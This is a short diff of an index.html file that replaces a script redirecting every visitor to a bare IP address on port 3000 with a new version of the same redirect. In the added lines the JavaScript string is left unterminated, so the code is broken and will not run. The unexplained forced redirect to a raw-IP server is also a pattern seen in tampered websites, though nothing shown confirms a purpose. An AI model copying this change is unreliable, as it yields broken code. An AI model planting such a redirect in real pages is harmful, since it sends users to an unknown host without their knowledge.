--- a/index.html
+++ b/index.html
@@ -1,1 +1,3 @@
-<script type="text/javascript">window.location.href="http://8.130.43.52:3000/";</script>
+<script>
+  window.location.href="http://8.130.43.52:3000/
+</script>
